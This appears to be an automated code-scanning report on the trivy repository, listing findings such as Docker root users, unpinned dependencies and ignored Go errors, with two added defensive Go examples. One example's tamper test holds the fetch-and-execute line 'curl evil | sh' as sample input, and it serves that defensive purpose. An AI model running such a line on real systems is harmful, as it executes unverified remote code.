Remote install command pipes network code directly to a shell
docs/guide/advanced/container/embed-in-dockerfile.md:12
· conf 0.70
Remote install command pipes network code directly to a shell
AGT015
Remote install command pipes network code directly to a shell
docs/tutorials/integrations/circleci.md:19
· conf 0.70
Remote install command pipes network code directly to a shell
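Three findings above share one fix: SEC035 (reading attacker-sized input without a bound), MINED004 (MD5/SHA-1 where integrity matters) and AGT015 (`curl ... | sh`, which executes whatever arrived). The block below is an added example, not code from the trivy repository: it bounds the read, verifies a pinned SHA-256 in constant time, and only then returns bytes that may be executed. `sampleScript` is a constructed stand-in for a downloaded installer; `PinnedDigest` stands for the value you would record once, out of band, from a copy verified by signature or release page.

```go
package main

import (
	"bytes"
	"crypto/sha256"
	"crypto/subtle"
	"encoding/hex"
	"errors"
	"fmt"
	"io"
)

var (
	ErrTooLarge       = errors.New("artifact exceeds size limit")
	ErrDigestMismatch = errors.New("artifact digest mismatch")
)

// ReadBounded reads at most limit bytes and fails if the stream has more. Reading one
// byte past the limit is what detects "more": a Content-Length header is attacker-supplied,
// and io.ReadAll on an unbounded body is the allocation SEC035 warns about.
func ReadBounded(r io.Reader, limit int64) ([]byte, error) {
	data, err := io.ReadAll(io.LimitReader(r, limit+1))
	if err != nil {
		return nil, err
	}
	if int64(len(data)) > limit {
		return nil, ErrTooLarge
	}
	return data, nil
}

// PinnedDigest produces the expected value once, out of band, from a copy of the artifact
// verified by other means (signature, release page over TLS). It is then committed as a constant.
func PinnedDigest(data []byte) string {
	sum := sha256.Sum256(data)
	return hex.EncodeToString(sum[:])
}

// VerifySHA256 compares in constant time. SHA-256 rather than MD5 or SHA-1: collisions are
// practical for both, so an attacker can produce a second artifact with the same digest,
// which defeats the one property an integrity check relies on.
func VerifySHA256(data []byte, expectedHex string) error {
	want, err := hex.DecodeString(expectedHex)
	if err != nil || len(want) != sha256.Size {
		return fmt.Errorf("expected digest %q is not a sha256 hex string", expectedHex)
	}
	got := sha256.Sum256(data)
	if subtle.ConstantTimeCompare(got[:], want) != 1 {
		return ErrDigestMismatch
	}
	return nil
}

// FetchVerified is the shape that replaces `curl ... | sh`: bound the read, verify the
// pinned digest, and only then hand back bytes that may be executed or installed.
func FetchVerified(r io.Reader, limit int64, expectedHex string) ([]byte, error) {
	data, err := ReadBounded(r, limit)
	if err != nil {
		return nil, err
	}
	if err := VerifySHA256(data, expectedHex); err != nil {
		return nil, err
	}
	return data, nil
}

// Constructed stand-in for a downloaded install script.
var sampleScript = []byte("#!/bin/sh\nset -eu\necho 'installing'\n")

func main() {
	pinned := PinnedDigest(sampleScript)
	_, err := FetchVerified(bytes.NewReader(sampleScript), 1<<20, pinned)
	fmt.Println("genuine:", err)
	tampered := append(append([]byte(nil), sampleScript...), "curl evil | sh\n"...)
	_, err = FetchVerified(bytes.NewReader(tampered), 1<<20, pinned)
	fmt.Println("tampered:", err)
}
```

A digest pinned in the same place the download URL lives protects against a swapped artifact but not against a compromised publisher; a detached signature (cosign, GPG) verified against a key obtained separately is the next step up.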
AUC001
No Repobility access matrix policy found
· conf 0.92
[AUC001] No Repobility access matrix policy found: The repository uses web/API frameworks but does not define .repobility/access.yml or equivalent authorization documentation.
AUC002
Low visible authorization coverage in route inventory
· conf 0.74
[AUC002] Low visible authorization coverage in route inventory: Only 2.7% of discovered routes show nearby authentication, authorization, middleware, or public-route evidence.
AUC009
Sensitive function route lacks elevated authorization evidence
pkg/iac/scanners/terraform/parser/evaluator.go:250
· conf 0.68
[AUC009] Sensitive function route lacks elevated authorization evidence: A route appears to perform a sensitive function such as export, invite, role, token, billing, or destructive action without el…
AUC009
Sensitive function route lacks elevated authorization evidence
pkg/x/http/trace.go:191
· conf 0.68
[AUC009] Sensitive function route lacks elevated authorization evidence: A route appears to perform a sensitive function such as export, invite, role, token, billing, or destructive action without el…
AUC009
Sensitive function route lacks elevated authorization evidence
rpc/cache/service.twirp.go:1169
· conf 0.68
[AUC009] Sensitive function route lacks elevated authorization evidence: A route appears to perform a sensitive function such as export, invite, role, token, billing, or destructive action without el…
AUC009
Sensitive function route lacks elevated authorization evidence
rpc/cache/service.twirp.go:1180
· conf 0.68
[AUC009] Sensitive function route lacks elevated authorization evidence: A route appears to perform a sensitive function such as export, invite, role, token, billing, or destructive action without el…
DKR001
Docker final stage has no non-root USER
Dockerfile:1
· conf 0.82
Docker final stage has no non-root USER
DKR001
Docker final stage has no non-root USER
Dockerfile.canary:1
· conf 0.82
Docker final stage has no non-root USER
DKR001
Docker final stage has no non-root USER
docs/build/Dockerfile:1
· conf 0.82
Docker final stage has no non-root USER
DKR001
Docker final stage has no non-root USER
integration/testdata/fixtures/repo/dockerfile/Dockerfile:1
· conf 0.82
Docker final stage has no non-root USER
DKR001
Docker final stage has no non-root USER
pkg/dependency/parser/java/jar/testdata/testimage/gradle/Dockerfile:1
· conf 0.82
Docker final stage has no non-root USER
DKR001
Docker final stage has no non-root USER
pkg/dependency/parser/java/jar/testdata/testimage/maven/Dockerfile:1
· conf 0.82
Docker final stage has no non-root USER
DKR001
Docker final stage has no non-root USER
pkg/fanal/analyzer/buildinfo/testdata/dockerfile/Dockerfile.sad:1
· conf 0.82
Docker final stage has no non-root USER
DKR001
Docker final stage has no non-root USER
pkg/fanal/analyzer/config/testdata/src/Dockerfile:1
· conf 0.82
Docker final stage has no non-root USER
DKR001
Docker final stage has no non-root USER
pkg/fanal/artifact/local/testdata/misconfig/dockerfile/multiple-failures/src/Dockerfile:3
· conf 0.82
Docker final stage has no non-root USER
DKR001
Docker final stage has no non-root USER
pkg/fanal/artifact/local/testdata/misconfig/dockerfile/passed/src/Dockerfile:1
· conf 0.82
Docker final stage has no non-root USER
DKR001
Docker final stage has no non-root USER
pkg/fanal/artifact/local/testdata/misconfig/dockerfile/single-failure/src/Dockerfile:1
· conf 0.82
Docker final stage has no non-root USER
DKR002
Dockerfile base image has no explicit tag
pkg/fanal/analyzer/config/testdata/src/Dockerfile:1
· conf 0.90
Dockerfile base image has no explicit tag
DKR002
Dockerfile base image has no explicit tag
pkg/fanal/artifact/local/testdata/misconfig/dockerfile/multiple-failures/src/Dockerfile:1
· conf 0.90
Dockerfile base image has no explicit tag
DKR002
Dockerfile base image has no explicit tag
pkg/fanal/artifact/local/testdata/misconfig/dockerfile/multiple-failures/src/Dockerfile:3
· conf 0.90
Dockerfile base image has no explicit tag
DKR002
Dockerfile base image has no explicit tag
pkg/fanal/artifact/local/testdata/misconfig/dockerfile/passed/src/Dockerfile:1
· conf 0.90
Dockerfile base image has no explicit tag
DKR002
Dockerfile base image has no explicit tag
pkg/fanal/artifact/local/testdata/misconfig/dockerfile/single-failure/src/Dockerfile:1
· conf 0.90
Dockerfile base image has no explicit tag
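The MINED118, DKR002, DKR001 and SEC069 findings above are all decided by three facts about a Dockerfile: how each `FROM` reference resolves, which stage is final, and what `USER` that stage ends with. The following is an added example, not code from the trivy repository (trivy's own Dockerfile checks live in its misconfiguration scanner), showing the parsing those rules need: `--platform` flags, `AS` names, line continuations, `FROM <earlier stage>` inheriting that stage's `USER`, a `:` that is a registry port rather than a tag, `scratch`, `${ARG}` references, and the bare `sha256:...` form from the `Dockerfile.sad` finding, which names no repository at all. The two Dockerfiles and the digest value are constructed placeholders.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

type Stage struct {
	Image, Name, User string // FROM argument as written; "AS <name>"; last USER in the stage
	FromStage         bool   // Image names an earlier stage rather than a registry image
}

var digestRe = regexp.MustCompile(`^sha256:[0-9a-f]{64}$`)

// ParseStages folds line continuations, then records FROM and USER per stage.
func ParseStages(dockerfile string) []Stage {
	var stages []Stage
	byName := map[string]int{}
	for _, raw := range strings.Split(strings.ReplaceAll(dockerfile, "\\\n", " "), "\n") {
		f := strings.Fields(raw)
		if len(f) < 2 || strings.HasPrefix(f[0], "#") {
			continue
		}
		switch strings.ToUpper(f[0]) {
		case "FROM":
			a := f[1:]
			if len(a) > 1 && strings.HasPrefix(a[0], "--") { // e.g. --platform=linux/amd64
				a = a[1:]
			}
			st := Stage{Image: a[0]}
			if len(a) >= 3 && strings.EqualFold(a[1], "AS") {
				st.Name = a[2]
			}
			if idx, ok := byName[st.Image]; ok { // FROM <earlier stage> inherits its USER
				st.FromStage, st.User = true, stages[idx].User
			}
			if st.Name != "" {
				byName[st.Name] = len(stages)
			}
			stages = append(stages, st)
		case "USER":
			if len(stages) > 0 {
				stages[len(stages)-1].User = f[1]
			}
		}
	}
	return stages
}

// ClassifyRef says how a FROM reference resolves at build time.
func ClassifyRef(ref string) string {
	switch {
	case ref == "scratch" || strings.HasPrefix(ref, "$"):
		return "skip" // nothing to pin, or ${ARG} that cannot be judged statically
	case digestRe.MatchString(ref):
		return "no-repository" // bare sha256:... names no image repository
	}
	if i := strings.Index(ref, "@"); i >= 0 && digestRe.MatchString(ref[i+1:]) {
		return "digest" // content-addressed, immutable
	}
	if strings.Contains(ref[strings.LastIndex(ref, "/")+1:], ":") {
		return "tag" // ':' after the last '/' is a tag (before it, a registry port); mutable
	}
	return "untagged" // implicit :latest, also mutable
}

// Check applies MINED118/DKR002 to every FROM and DKR001 to the final stage.
func Check(dockerfile string) []string {
	stages, out := ParseStages(dockerfile), []string{}
	for i, st := range stages {
		if st.FromStage {
			continue
		}
		switch kind := ClassifyRef(st.Image); kind {
		case "tag", "no-repository":
			out = append(out, fmt.Sprintf("MINED118 stage %d: FROM %s not pinned by sha256 digest (%s)", i, st.Image, kind))
		case "untagged":
			out = append(out, fmt.Sprintf("DKR002 stage %d: FROM %s has no explicit tag", i, st.Image))
		}
	}
	if n := len(stages); n > 0 {
		if u := strings.SplitN(stages[n-1].User, ":", 2)[0]; u == "" || u == "root" || u == "0" {
			out = append(out, "DKR001 final stage has no non-root USER")
		}
	}
	return out
}

// Constructed samples; the digest is a placeholder, not a real image digest.
const weakDockerfile = `FROM golang:1.22 AS builder
FROM alpine:3.23.4`

const hardenedDockerfile = `FROM --platform=linux/amd64 golang:1.22@sha256:0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef AS builder
FROM alpine:3.23.4@sha256:0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef
USER 10001:10001`

func main() {
	fmt.Println(Check(weakDockerfile), Check(hardenedDockerfile))
}
```

A numeric `USER` is deliberate in the hardened sample: Kubernetes `runAsNonRoot` can only verify a numeric UID, and a named user that the image never created still resolves to root at runtime.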
DKR018
Database dump or local database file is included in Docker build context
.dockerignore
· conf 0.86
Database dump or local database file is included in Docker build context
MINED124
requirements.txt entry has no version pin
CWE-1357
integration/testdata/fixtures/repo/pip/requirements.txt:5
· conf 0.90
[MINED124] requirements.txt: `MarkupSafe>2.0.0` has no version pin: Unpinned pip requirement means every fresh install may resolve a different version. Newer releases can introduce malicious code (ty…
MINED124
requirements.txt entry has no version pin
CWE-1357
pkg/fanal/analyzer/language/python/pip/testdata/happy/requirements.txt:5
· conf 0.90
[MINED124] requirements.txt: `Jinja2<3.0.0` has no version pin: Unpinned pip requirement means every fresh install may resolve a different version. Newer releases can introduce malicious code (typosq…
MINED124
requirements.txt entry has no version pin
CWE-1357
pkg/fanal/analyzer/language/python/pip/testdata/happy/requirements.txt:6
· conf 0.90
[MINED124] requirements.txt: `MarkupSafe>2.0.0` has no version pin: Unpinned pip requirement means every fresh install may resolve a different version. Newer releases can introduce malicious code (ty…
MINED124
requirements.txt entry has no version pin
CWE-1357
pkg/fanal/analyzer/language/python/pip/testdata/happy/requirements.txt:7
· conf 0.90
[MINED124] requirements.txt: `Werkzeug` has no version pin: Unpinned pip requirement means every fresh install may resolve a different version. Newer releases can introduce malicious code (typosquats…
SEC091
Go: net/http server without timeouts
pkg/rpc/server/listen.go:67
· conf 1.00
[SEC091] Go: net/http server without timeouts: HTTP server without ReadHeaderTimeout/ReadTimeout/WriteTimeout is vulnerable to Slowloris. Ported from gosec G112 + G114 (Apache-2.0).
AIC003
Duplicated implementation block across source files
pkg/dependency/parser/rust/cargo/naive_pkg_parser.go:14
· conf 0.86
Duplicated implementation block across source files
AIC003
Duplicated implementation block across source files
pkg/detector/ospkg/coreos/coreos.go:2
· conf 0.86
Duplicated implementation block across source files
AIC003
Duplicated implementation block across source files
pkg/detector/ospkg/minimos/minimos.go:41
· conf 0.86
Duplicated implementation block across source files
AIC003
Duplicated implementation block across source files
pkg/detector/ospkg/photon/photon.go:47
· conf 0.86
Duplicated implementation block across source files
AIC003
Duplicated implementation block across source files
pkg/detector/ospkg/redhat/redhat.go:143
· conf 0.86
Duplicated implementation block across source files
AIC003
Duplicated implementation block across source files
pkg/detector/ospkg/rocky/rocky.go:43
· conf 0.86
Duplicated implementation block across source files
AIC003
Duplicated implementation block across source files
pkg/detector/ospkg/seal/seal.go:89
· conf 0.86
Duplicated implementation block across source files
AIC003
Duplicated implementation block across source files
pkg/detector/ospkg/suse/suse.go:110
· conf 0.86
Duplicated implementation block across source files
AIC003
Duplicated implementation block across source files
pkg/detector/ospkg/suse/suse.go:114
· conf 0.86
Duplicated implementation block across source files
AIC003
Duplicated implementation block across source files
pkg/detector/ospkg/wolfi/wolfi.go:35
· conf 0.86
Duplicated implementation block across source files
AIC003
Duplicated implementation block across source files
pkg/detector/ospkg/wolfi/wolfi.go:41
· conf 0.86
Duplicated implementation block across source files
AIC003
Duplicated implementation block across source files
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/opens464b5c427ce9d/e/conanfile.py:7
· conf 0.86
Duplicated implementation block across source files
AIC003
Duplicated implementation block across source files
pkg/fanal/analyzer/language/c/conan/testdata/cacheDir_v2/p/zlib41bd3946e7341/e/conanfile.py:1
· conf 0.86
Duplicated implementation block across source files
AIC003
Duplicated implementation block across source files
pkg/fanal/analyzer/language/java/gradle/lockfile.go:74
· conf 0.86
Duplicated implementation block across source files
AIC003
Duplicated implementation block across source files
pkg/fanal/analyzer/language/java/gradle/pom.go:43
· conf 0.86
Duplicated implementation block across source files
AIC003
Duplicated implementation block across source files
pkg/fanal/analyzer/os/redhatbase/centos.go:1
· conf 0.86
Duplicated implementation block across source files
AIC003
Duplicated implementation block across source files
pkg/fanal/analyzer/os/redhatbase/fedora.go:1
· conf 0.86
Duplicated implementation block across source files
AIC003
Duplicated implementation block across source files
pkg/fanal/analyzer/os/redhatbase/oracle.go:1
· conf 0.86
Duplicated implementation block across source files
AIC003
Duplicated implementation block across source files
pkg/fanal/analyzer/os/redhatbase/rocky.go:1
· conf 0.86
Duplicated implementation block across source files
DKR008
.dockerignore misses sensitive defaults
.dockerignore
· conf 0.72
.dockerignore misses sensitive defaults
DKR012
Dockerfile keeps pip download cache
docs/build/Dockerfile:6
· conf 0.72
Dockerfile keeps pip download cache
ERR003
[ERR003] Ignored Error (Go): Ignoring error return values.
pkg/cache/client.go:72
· conf 1.00
[ERR003] Ignored Error (Go): Ignoring error return values.
ERR003
[ERR003] Ignored Error (Go): Ignoring error return values.
pkg/dependency/parser/golang/binary/parse.go:64
· conf 1.00
[ERR003] Ignored Error (Go): Ignoring error return values.
ERR003
[ERR003] Ignored Error (Go): Ignoring error return values.
pkg/dependency/parser/java/pom/pom.go:343
· conf 1.00
[ERR003] Ignored Error (Go): Ignoring error return values.
SEC075
Dockerfile: no HEALTHCHECK
pkg/fanal/analyzer/buildinfo/dockerfile.go:1
· conf 1.00
[SEC075] Dockerfile: no HEALTHCHECK: No HEALTHCHECK directive — orchestrators can't detect a wedged process. Ported from trivy DS026 / checkov CKV_DOCKER_2 (Apache-2.0). Implement file-level: skip if…
SEC075
Dockerfile: no HEALTHCHECK
pkg/fanal/analyzer/config/dockerfile/docker.go:1
· conf 1.00
[SEC075] Dockerfile: no HEALTHCHECK: No HEALTHCHECK directive — orchestrators can't detect a wedged process. Ported from trivy DS026 / checkov CKV_DOCKER_2 (Apache-2.0). Implement file-level: skip if…
SEC075
Dockerfile: no HEALTHCHECK
pkg/fanal/analyzer/imgconf/dockerfile/dockerfile.go:1
· conf 1.00
[SEC075] Dockerfile: no HEALTHCHECK: No HEALTHCHECK directive — orchestrators can't detect a wedged process. Ported from trivy DS026 / checkov CKV_DOCKER_2 (Apache-2.0). Implement file-level: skip if…
ERR003
[ERR003] Ignored Error (Go): Ignoring error return values.
· conf 0.20
[ERR003] Ignored Error (Go) (and 46 more): Same pattern found in 46 additional files. Review if needed.
MINED004
Weak Crypto
CWE-327
· conf 0.20
[MINED004] Weak Crypto (and 9 more): Same pattern found in 9 additional files. Review if needed.
MINED016
Go Error Ignored
CWE-754
· conf 0.20
[MINED016] Go Error Ignored (and 7 more): Same pattern found in 7 additional files. Review if needed.
MINED043
Http Not Https
CWE-319
· conf 0.20
[MINED043] Http Not Https (and 1 more): Same pattern found in 1 additional files. Review if needed.
MINED043
Http Not Https
CWE-319
internal/testutil/localstack.go:47
· conf 1.00
[MINED043] Http Not Https: Hardcoded http:// (not localhost) for endpoints that handle credentials or data.
MINED043
Http Not Https
CWE-319
pkg/fanal/image/daemon/podman.go:20
· conf 1.00
[MINED043] Http Not Https: Hardcoded http:// (not localhost) for endpoints that handle credentials or data.
MINED043
Http Not Https
CWE-319
pkg/sbom/sbom.go:98
· conf 1.00
[MINED043] Http Not Https: Hardcoded http:// (not localhost) for endpoints that handle credentials or data.
MINED044
Js Console Log Prod
CWE-532
.github/actions/trivy-triage/helpers.js:13
· conf 1.00
[MINED044] Js Console Log Prod: console.log left in code. Should be replaced with logger or removed.
MINED060
Go Context No Cancel
CWE-401
· conf 0.20
[MINED060] Go Context No Cancel (and 5 more): Same pattern found in 5 additional files. Review if needed.
MINED060
Go Context No Cancel
CWE-401
cmd/trivy/main.go:38
· conf 1.00
[MINED060] Go Context No Cancel: context.Background() at request handler boundary leaks goroutines.
MINED060
Go Context No Cancel
CWE-401
magefiles/spdx.go:84
· conf 1.00
[MINED060] Go Context No Cancel: context.Background() at request handler boundary leaks goroutines.
MINED060
Go Context No Cancel
CWE-401
pkg/iac/rego/load.go:330
· conf 1.00
[MINED060] Go Context No Cancel: context.Background() at request handler boundary leaks goroutines.
MINED071
Go Panic Call
CWE-755
· conf 0.20
[MINED071] Go Panic Call (and 5 more): Same pattern found in 5 additional files. Review if needed.
MINED071
Go Panic Call
CWE-755
internal/testutil/image.go:27
· conf 1.00
[MINED071] Go Panic Call: panic() crashes the process. Should return error in most cases.
MINED071
Go Panic Call
CWE-755
misc/eol/main.go:23
· conf 1.00
[MINED071] Go Panic Call: panic() crashes the process. Should return error in most cases.
MINED071
Go Panic Call
CWE-755
pkg/iac/rego/convert/slice.go:17
· conf 1.00
[MINED071] Go Panic Call: panic() crashes the process. Should return error in most cases.
SEC020
Secret Printed to Logs
pkg/iac/scanners/terraform/parser/resolvers/registry.go:72
· conf 0.15
[SEC020] Secret Printed to Logs: Debug or diagnostic code appears to print a credential-bearing value. This is a frequent AI-assisted coding failure: the helper exposes the exact value needed for tro…
SEC029
Server-Side Request Forgery (SSRF) — outbound HTTP from user input
· conf 0.20
[SEC029] Server-Side Request Forgery (SSRF) — outbound HTTP from user input (and 12 more): Same pattern found in 12 additional files. Review if needed.
SEC045
eval()/exec() on stored or user-supplied data
pkg/iac/rego/scanner.go:143
· conf 0.10
[SEC045] eval()/exec() on stored or user-supplied data: eval() and exec() on data — even admin-stored data — is a lateral-movement vector after any one credential compromise. Sandboxes (__builtins__ …
SEC045
eval()/exec() on stored or user-supplied data
pkg/result/filter.go:316
· conf 0.10
[SEC045] eval()/exec() on stored or user-supplied data: eval() and exec() on data — even admin-stored data — is a lateral-movement vector after any one credential compromise. Sandboxes (__builtins__ …
SEC069
Dockerfile: no USER directive (runs as root)
· conf 0.20
[SEC069] Dockerfile: no USER directive (runs as root) (and 3 more): Same pattern found in 3 additional files. Review if needed.
SEC075
Dockerfile: no HEALTHCHECK
· conf 0.20
[SEC075] Dockerfile: no HEALTHCHECK (and 3 more): Same pattern found in 3 additional files. Review if needed.